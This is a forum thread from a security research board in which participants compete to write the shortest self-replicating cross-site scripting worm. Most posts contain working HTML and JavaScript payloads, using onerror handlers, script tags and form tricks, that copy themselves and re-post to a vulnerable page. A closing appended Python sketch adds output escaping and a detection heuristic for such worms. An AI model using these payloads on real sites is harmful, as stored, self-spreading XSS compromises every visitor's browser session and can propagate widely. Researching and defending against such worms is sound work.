Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 05:25PM

i don't really care about capitalisation, TBH. as long as the code-length stays the same (if your injection is gonna fail because of code length, it will also do so in the second generation of the worm) and the functionality identical, i'd say it's a valid worm, IMO.

i did notice FF mangles the code in bwb's worm.. the weirdest thing i saw about it is that it somehow seemed to have changed the [0] to firstChild, i didn't expect FF to "fix" event handler JS code, too.
too bad, cause the [0] is also a nice trick.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 05:32PM

@bwblabs
damn, you are right about <input name="content"> the quotes!!
that makes mine 2 bytes larger :(

so that makes mine.. 146 bytes for a general case exploitation.. and maybe 163 for ensuring the exact same content all the time (as rsnake asked).. I'll put my code next week (on wednesday), cuz I use a little trick to make the code a huge bunch of bytes smaller.. anyway, if you ask the code in private I may show it to you :P

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 04, 2008 05:35PM

I saw it and we are all doomed anyway ;)

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 04, 2008 05:36PM

Right - what I'm concerned about with the byte length is that we are assuming the content length of whatever input field you are submitting into is a fixed length and won't change once the user executes the worm, so code that resizes itself (bigger) is a non-starter.

Regarding the [0] trick - that's fine, sorry, I may have misread in a hurry. As long as we are assuming I can put anything above or below it that you'd find on a normal HTML page and it wouldn't break your code (including other non-disruptive scripts or html tags) that's fine.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 05:38PM

hmm seems firefox adds all quotes back on if you leave them off :)

so my previous entry is invalid.

my current one (i'm losing track a little bit here, dunno if this would be the smallest valid one?) (at least i assume it's valid, still can't test for IE7)

<b><img src="." onerror="alert('xss');with(this.nextSibling)firstChild.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

187 chars

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 04, 2008 05:48PM

<b><img onerror="alert('xss');with(this.nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=""><form><input name="content"></form></b>
181 chars, exact replication on Firefox, same length on IE.
Enough for now (daily job, real life and all).
If I've got something else I'll post it after Sirdarckcat ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 05:49PM

src=""
is the shortest thing (for IE & FF) - off 1 byte :-)

BTW. I'm working on a damn short thing too (no onerrors ;-) ...



Edited 1 time(s). Last edit at 01/04/2008 05:50PM by bwb labs.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 05:57PM

Hehe, well ma1, you used one of the tricks (action=(method='post')+'.php'), but the best of all remains untouched.. that r0x

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/04/2008 05:58PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 05:58PM

bwb labs Wrote:
-------------------------------------------------------
> src="" is the shortest thing (for IE & FF) - off 1
> byte :-)
>
> BTW. I'm working on a damn short thing too (no
> onerrors ;-) ...

it's not in the rules, so it doesn't matter much, but for Opera "." is the shortest, "" doesn't work.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 06:05PM

<b><img onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src="">
<form><input name="content"></form></b>

176 chars.

in FF you can leave out the "this" keyword, cause that's the local scope already anyway.

can someone check if this is also the case in IE7?

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 04, 2008 06:08PM

Stop spamming my RSS feed, continue the conversation though ;x

Oops, important thread. Let me read this before I blabber away.



Edited 1 time(s). Last edit at 01/04/2008 06:09PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: barbarianbob
Date: January 04, 2008 06:34PM

165 ftw

<b<form action=post.php method=post><img src=. onerror=alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()><input name=content></form</b>

Still, I'm not sure if it works in IE7.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 06:36PM

@barbarianbob
sorry, but your payload gets translated when replicated to:
<b><form action="post.php" method="post"><img src="." onerror="alert('xss');with(parentNode)content.value=parentNode.innerHTML.bold(),submit()"><input name="content"></form></b>

that's 178 bytes

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 04, 2008 07:04PM

hehe this is just the start, wait things get more interesting :) mmmmm 10 pints of lager seem to make sense of it all....

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 04, 2008 07:06PM

did I mention I was having a baby girl :) whoooaaaa I'm drunk a baby little girl hacker :) c'mon woah time I went 2 bed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 04, 2008 07:07PM

Yeah I'm avin a baby girl....sorry daddy moment here :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 04, 2008 07:15PM

hey I'm just intentionally making it harder for myself :P

Did I mention I'm having a baby girl? I'm so proud....ok sorry I'm a bit pissed but I will create better code than anyone that submits I promise my baby girl :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 07:17PM

rsnake Wrote:
-------------------------------------------------------
> @.mario - interesting... I always thought IE7.0 required var before variable definition.
> (...) You can also type "<\/script>" to save two bytes.

var defines a local (function) variable (note that JavaScript only has function scope!), if you don't define a variable you're working in global space (which is nasty, but for worms who gives a damn ;-).
When evaluating "<\/script>" it becomes "</script>", so it might not replicate right ...



Edited 1 time(s). Last edit at 01/04/2008 07:19PM by bwb labs.

Re: Diminutive XSS Worm Replication Contest
Posted by: Reiners
Date: January 04, 2008 07:17PM

if you count every byte why use long names like "content"?

<b><img onerror="alert('xss');with(nextSibling)c.value=parentNode.innerHTML.bold(),action=(method='post')+'.php',submit()" src=".">
<form><input name="c"></form></b>
(Ritz code with short name "c")

That saves you 12 bytes.
Or did I get something wrong?



Edited 1 time(s). Last edit at 01/04/2008 07:49PM by Reiners.

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 07:20PM

162 characters! :-D

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,155);click()" type="image">

(again, not tested in IE7)

(edit: of course the last semicolon is not needed, duh)
(edit2: means i should also change the constant, which should be codesize-6)

i keep on debugging this thing (but it stays the same length), constant needs to be codesize-7



Edited 4 time(s). Last edit at 01/04/2008 07:53PM by ritz.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 07:21PM

Reiners Wrote:
-------------------------------------------------------
> if you count every byte why use long names like "content"?

rsnake Wrote:
-------------------------------------------------------
> 2) must self replicate the entire payload to a page called "post.php" as a parameter called "content"

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 07:22PM

reiners: it's because rsnake required the name to be "content". when writing a worm you can't control this name, because it has to correspond to the POST variable the server is expecting.

Re: Diminutive XSS Worm Replication Contest
Posted by: Reiners
Date: January 04, 2008 07:23PM

ouch, I had this weird feeling while pressing the post button that something is wrong ;) nevermind.

edit:
I've tested the last worms of Ritz and barbarianbob on IE7.0, all successfully.



Edited 1 time(s). Last edit at 01/04/2008 07:39PM by Reiners.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 07:52PM

ritz Wrote:
-------------------------------------------------------
> <form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,158);click()" type="image">
> (again, not tested in IE7)

Had the same thought about using an image, nice trick with the substr! The submit works in IE 7, but this is posted:
content.x=0&content.y=0
By my knowledge IE only submits the value of a submit button if you really click on it ...

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 07:56PM

huhhh that is weird

hrmmm i think i see what's going on. if you click on an image, you generally also get the coordinates of the click. those are the .x and the .y, which are 0 of course because the click was generated ..

shit, back to the drawing board then

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 04, 2008 08:02PM

ritz Wrote:
-------------------------------------------------------
> if you click on an image, you generally also get the coordinates of the click.

The coordinates are not the problem (happens in FF too), but the lack of the real content variable is the problem (doesn't happen in FF).

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 08:05PM

ah I was so scared that ritz had a smaller code than mine, I'm just happy it doesn't work on IE.. I love IE

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 08:06PM

ok, does it work in IE if i set the type attribute back to some illegal value before submitting?

<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

still 168 bytes, not bad.

if this does not work, how about clearing the type attribute:

with a zero (170)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,163);type=0;submit()" type="image">

or with an empty string (171)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';value='<form>'+p.innerHTML.substr(0,164);type='';submit()" type="image">

Re: Diminutive XSS Worm Replication Contest
Posted by: ritz
Date: January 04, 2008 08:09PM

bwb labs Wrote:
-------------------------------------------------------
> if you click on an image, you generally also get
> the coordinates of the click.
> The coordinates are not the problem (happens in FF
> too), but the lack of the real content variable is
> the problem (doesn't happen in FF).

you sure? how does this happen? because if you fill in a value for a regular non-image element, it does submit.

also, if it sends coordinates on click, why not the value?

is it because of the image type?

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 04, 2008 08:20PM

ok, I'll show mine.. since almost all the tricks were revealed anyway..

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>

that's the rule-compliant version, of 159 bytes

this is the small, not-portable-but-effective version of 145 bytes:

<form id=z><input name="content"><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/04/2008 08:27PM by sirdarckcat.
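Added example, not code from the thread or any of its posters: the server side of the replication chain the entries above exercise. Every variant here reads its own container's innerHTML and re-posts it as "content" to post.php, which only works if post.php echoes stored content back as live markup. The sketch below entity-encodes on output so the echoed copy is inert text, and adds a heuristic that flags a submission carrying the three ingredients every entry in this thread shares (an execution vector, a DOM self-read, a form submit). Function and pattern names are my own assumptions; the sample input is constructed in the shape of the thread's entries.

```python
import html
import re

# Execution vector: an inline on* event handler attribute or a script tag.
EVENT_HANDLER = re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
# Self-read of the surrounding markup, as every entry in the thread does.
SELF_READ = re.compile(r"\b(inner|outer)HTML\b")
# Re-submission of that markup through a form.
FORM_SUBMIT = re.compile(r"\bsubmit\s*\(")


def looks_self_replicating(content: str) -> bool:
    """Heuristic: flag a submission that combines an execution vector,
    a DOM self-read and a form submit (assumed rule, not a proven filter)."""
    vector = EVENT_HANDLER.search(content) or SCRIPT_TAG.search(content)
    return bool(vector and SELF_READ.search(content) and FORM_SUBMIT.search(content))


def render_comment(stored: str) -> str:
    """How a post.php should echo stored content: entity-encoded, so the
    browser shows the markup as text and the onerror/script never parses.
    With this in place, the worm's innerHTML read yields encoded text and
    the second generation never executes."""
    return "<p>" + html.escape(stored, quote=True) + "</p>"


# Constructed sample in the shape of the entries above (alert omitted).
SAMPLE = ('<b><img src="" onerror="with(nextSibling)content.value='
          'parentNode.innerHTML.bold(),submit()">'
          '<form><input name="content"></form></b>')
# Constructed benign comment with ordinary formatting markup.
BENIGN = '<b>hello</b> <a href="http://example.invalid">link</a>'


def check(content: str) -> dict:
    """Decision a moderation hook could log: whether the submission was
    flagged, and the inert form it will be rendered in."""
    return {"flagged": looks_self_replicating(content),
            "rendered": render_comment(content)}


if __name__ == "__main__":
    for name, body in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, check(body))
```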
